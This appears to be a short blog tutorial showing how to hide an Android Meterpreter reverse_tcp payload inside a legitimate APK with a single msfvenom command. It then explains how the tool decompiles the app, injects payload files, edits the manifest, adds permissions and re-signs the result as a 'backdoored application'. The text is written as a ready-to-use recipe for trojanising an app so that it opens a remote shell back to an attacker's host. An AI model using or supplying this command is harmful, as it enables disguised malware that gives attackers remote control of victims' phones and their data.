Hiding a Payload in Original Apk using Metasploit Command

Today finally embedded the payload apk into the original apk file. There is a simple way to bind the payload into the original apk file. The command is much easy but the work done by the command is very complex. Hats Off H.D. Moore

Now In this tutorial I'm going to explain how to embed the payload into the original apk file and I'm also going to explain that how the command is working.


Command :

msfvenom -x 'Original apk file' -p android/meterpreter/reverse_tcp LHOST=(ipaddress) LPORT=4444 -o 'backdoor-apk filename'

Working:

Step 1 :  First of all it is decompling the Original Apk file.

Step2 : Now in that extracted folder it is creating all the payload.smali files in com/metasploit/stage/...

Step 3 : It is locating the AndroidManifest.xml file and doing changes in that file by adding the command to execute the payload.smali files.

Step 4 : After that it is adding permission to the apk file.

Step 5 : Finally it is adding signature to the output apk file.


This is how the payload is getting hide into an android application.
Now the final output is termed as backdoored application.


Post a Comment

0 Comments